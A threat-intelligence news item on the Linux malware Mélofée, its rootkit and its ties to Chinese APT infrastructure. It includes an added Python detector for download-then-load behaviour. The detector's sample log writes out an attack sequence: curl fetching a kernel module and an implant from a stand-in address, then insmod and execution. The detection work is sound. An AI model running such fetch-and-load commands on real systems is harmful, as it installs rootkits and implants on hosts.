
New Malware Family Mélofée Linked to Chinese APT Cluster

A new Linux malware family, Mélofée, has been discovered on servers belonging to a small number of high-value targets. Based on its capabilities and other TTPs, the implant has been linked to a cluster of Chinese state-sponsored groups, specifically the Winnti group.

Mélofée has three variants

ExaTrack identified three distinct samples of Mélofée, likely dated between January and May 2022.
  • All three samples share a common code base but differ in their communication protocols and encryption methods, which indicates the implant is still under active development.
  • One sample also drops a rootkit built for a single specific kernel version. Its code is derived from the open-source Reptile rootkit project.
  • Each sample ships with an installer that uses shell commands to download the rootkit and the main implant from an attacker-controlled server.
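The installer behaviour described above (a shell fetching a kernel module and a server implant, then loading and running them) is a pattern a defender can hunt for in process-execution telemetry without knowing any Mélofée-specific indicator. The following is an added example written for this page, not code from ExaTrack or from the malware; it assumes a simplified exec-log format of `unix_time pid ppid cmdline`, a constructed sample log in which all paths, process IDs and the TEST-NET address 198.51.100.7 are invented, and a 300-second correlation window. It flags a file downloaded by curl/wget that the same parent shell later passes to insmod/modprobe or executes directly, and it shows that a benign download (a kernel tarball) alone does not trigger an alert.

```python
"""Detect 'download a file, then load it as a kernel module or execute it'
in Linux process-execution logs (added example; constructed sample data)."""
import shlex
from dataclasses import dataclass

DOWNLOADERS = {"curl", "wget"}
MODULE_LOADERS = {"insmod", "modprobe"}
WINDOW_SECONDS = 300  # assumed maximum gap between fetch and load/exec

# Constructed sample log (hypothetical hosts, paths, PIDs and TEST-NET address).
SAMPLE_LOG = """\
1651400000 4012 3990 /bin/bash
1651400003 4013 4012 curl -sk -o /dev/shm/.x/rk.ko http://198.51.100.7/rk.ko
1651400004 4014 4012 curl -sk -o /dev/shm/.x/srv http://198.51.100.7/srv
1651400005 4015 4012 chmod +x /dev/shm/.x/srv
1651400006 4016 4012 insmod /dev/shm/.x/rk.ko
1651400007 4017 4012 /dev/shm/.x/srv
1651400100 5200 5100 wget -O /tmp/linux-5.10.tar.xz https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.10.tar.xz
1651400105 5201 5100 tar xf /tmp/linux-5.10.tar.xz
"""


@dataclass
class ExecEvent:
    ts: int
    pid: int
    ppid: int
    argv: list


def parse_exec_line(line):
    """Parse 'TS PID PPID CMDLINE'; CMDLINE is split with shell quoting rules."""
    ts, pid, ppid, cmdline = line.split(maxsplit=3)
    return ExecEvent(int(ts), int(pid), int(ppid), shlex.split(cmdline))


def _basename(path):
    return path.rstrip("/").rsplit("/", 1)[-1]


def download_target(argv):
    """Return the local path a curl/wget invocation writes to, or None."""
    tool = _basename(argv[0])
    if tool not in DOWNLOADERS:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ("-o", "-O", "--output", "--output-document") and i + 1 < len(argv):
            if tool == "curl" and arg == "-O":
                continue  # curl -O takes no operand; name comes from the URL
            return argv[i + 1]
    # curl -O, or wget without -O: file lands in cwd under the URL's basename
    for arg in argv[1:]:
        if arg.startswith(("http://", "https://")):
            return _basename(arg)
    return None


def loaded_module(argv):
    """Return the module path/name given to insmod or modprobe, or None."""
    tool = _basename(argv[0])
    if tool not in MODULE_LOADERS:
        return None
    return next((a for a in argv[1:] if not a.startswith("-")), None)


def _module_name(path):
    """'/dev/shm/.x/rk.ko' -> 'rk', so insmod paths and modprobe names compare."""
    name = _basename(path)
    return name[:-3] if name.endswith(".ko") else name


def detect_fetch_then_load(events):
    """Return (rule, parent_pid, downloaded_path, seconds_since_download) tuples
    for each downloaded file that the same parent shell loads as a kernel
    module or executes within WINDOW_SECONDS."""
    downloaded = {}  # (ppid, local path) -> download timestamp
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        path = download_target(ev.argv)
        if path is not None:
            downloaded[(ev.ppid, path)] = ev.ts
            continue
        mod = loaded_module(ev.argv)
        for (ppid, dpath), ts in downloaded.items():
            if ppid != ev.ppid or ev.ts - ts > WINDOW_SECONDS:
                continue
            if mod is not None and _module_name(mod) == _module_name(dpath):
                alerts.append(("kernel_module_from_download", ev.ppid, dpath, ev.ts - ts))
            elif ev.argv[0] == dpath:
                alerts.append(("exec_of_download", ev.ppid, dpath, ev.ts - ts))
    return alerts


def scan(log_text):
    """Parse a whole log and run the detection over it."""
    events = [parse_exec_line(ln) for ln in log_text.splitlines() if ln.strip()]
    return detect_fetch_then_load(events)


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Keying the correlation on the parent shell's PID rather than on the whole host keeps an unrelated admin download from pairing with an unrelated module load; a real deployment would also want the `uname -r` of the host, since the page notes the rootkit only targets one kernel version, and would read the events from auditd or an eBPF exec tracer rather than a text log.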

Additionally, researchers observed a second implant, dubbed AlienReverse, in use during the campaign. It shares a similar code base with Mélofée and bundles publicly available tools such as EarthWorm and socks_proxy.

Connection with other tools

The infrastructure used by the Mélofée implants overlaps with that of several other tools used by Chinese APT groups, reinforcing the view that these groups operate as multiple teams within a single larger organization.
  • Some of the servers have also served as C2 servers for ShadowPad, while others are linked to Winnti and HelloBot.
  • Some domains served as C2 servers for Cobalt Strike, PlugX, StowAway, and Spark, tools commonly used by Chinese APT groups.
  • In addition, the attackers used the legitimate remote control tool toDesk and the ezXSS tool.

Ending notes

The Mélofée malware family is yet another toolset in the arsenal of the cluster of Chinese state-sponsored APT groups. The implants have been seen in only a small number of intrusions, which suggests they were built for narrow tasks within a larger attack chain; alternatively, the attackers may be using them to divert defenders' attention from their real objective.
Publisher: Cyware